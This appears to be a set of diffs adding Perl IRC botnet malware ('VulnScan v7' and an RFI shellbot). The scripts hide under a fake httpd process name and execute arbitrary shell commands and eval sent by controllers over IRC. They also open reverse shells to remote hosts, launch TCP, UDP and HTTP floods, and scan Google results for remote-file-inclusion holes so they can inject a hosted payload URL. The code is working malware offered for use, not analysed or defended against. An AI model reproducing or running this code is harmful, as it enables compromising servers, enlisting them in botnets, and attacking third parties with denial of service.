sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &entrar(@_); }
sub entrar {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = "sendcon";
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq "sendcon") {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{"meuip"};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => "tcp") and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = "send";
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = "get";
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse "sub fixaddr" daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}


@ -0,0 +1,611 @@
# VulnScan v7 -Final- By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
#
# |_|0|_|
# |_|_|0|
# |0|0|0|
#
# New functions :
# Anti-Clone l33t
# Fixed Print on Infected Boxes
# Easy Configuration
# l33t Color
# BackConnect function (Usage: botname @back IP port)
#
#
# Scan command :
# !morgan !eval @gstring='google%20dork';
# !morgan @rfiscan vulnfile.php?vulnvar=
#
# DDoS commands :
# Udp : !morgan @udpflood IP packet-size time
# Tcp : !morgan @tcpflood IP port time
# Http: !morgan @httpflood www.website.com time
#
# Greets to :
#
# All #Morgan users...
#
#
# Enjoy the bot ....
# /Morgan
use HTTP::Request;
use LWP::UserAgent;
################ V7 CONFIGURATION #############################################################
my $processo = 'httpd -DSL -DSL2'; # Fake process name for the bot #
if (`ps uxw` =~ /httpd -DSL -DSL2/) # (CHANGE IT!!!) #
{ # #
exit; # #
} # #
###############################################################################################
my $linas_max='8'; # Avoid Flood #
###############################################################################################
my $sleep='5'; # sleep time #
##################### IRC #####################################################################
my @adms=("FabioMatador","dann123");
my @hostauth=("imbanaco2.att.net.co"); # Administrator Nickname #
###############################################################################################
my @canais=("#timao.eu"); # Channel ..if password -> ("#channel :pass") #
###############################################################################################
my $nick='efut'; # Nick prefix of the bot example : #
# vs[v7] = vs[v7]-718727 #
###############################################################################################
my $ircname = 'Dt Script'; # Identd of the bot #
###############################################################################################
chop (my $realname = `uname -a`); # Full Name #
###############################################################################################
$servidor='stockholm.se.quakenet.org' unless $servidor; # Server IRC of the bot #
###############################################################################################
my $porta='6667'; # Server PORT #
################ CMD ##########################################################################
my @cmdgif='http://fabiocpv.by.ru/aa.txt'; # If you change this cmd must be same as:#
# http://myspace.si/images/sad.gif #
###############################################################################################
my $VERSAO = 'v7';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# MORGAN OWNED YOUR BOX
#
# morgan.rx@gmail.com
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!eft)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\0034[SCAN]\003\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[VERSION]\003\002 w0rmb0t ver ".$VERSAO);
}
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[BackConnect]\003\002: Connecting to $host:$porta");
}
}
#SCANNER
if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
$boturl=$2;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034Scan\003\002 » Scanning for Remote file inclusion using \002 ".$boturl." \002 for \002 ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :\002\0034[x|Exploiting]\003\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdgif?";
print "\n".$url2."\n\n";
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Vulnerable]\003\002 ".$url2."\n\n");
}
}
else {
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Finished]\003\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP DDoSing]\003\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP]\003\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[UDP DDoSing]\003\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP-DDOS]\002 Média ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
# NOTE: DONT REMOVE COPYRIGHTS


@ -0,0 +1,568 @@
# SHELLBOT WITH VULNSCAN
# by destructive
# GREETINGZ:
# NOBODY, BECAUSE NOBODY HELPED US
#
#
#
# VISIT US ~
# IRC Network: irc.GigaChat.net
# IRC Channel: #Atk33
#
#
#
#
# pwn3d'
my $processo = 'httpd';
use HTTP::Request;
use LWP::UserAgent;
#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @cmdstring='http://raidenzin.freehostia.com/list.txt?';
my @adms=("Raiden","Morientes");
my @canais=("#Own");
my $nick='negrinhos';
my $ircname ='negrinhos';
chop (my $realname = `id`);
$servidor='211.220.193.249' unless $servidor;
my $porta='1999';
my $VERSAO = 'Shellbot RFI by destructive v1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!crew)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!crew" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","66
69","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
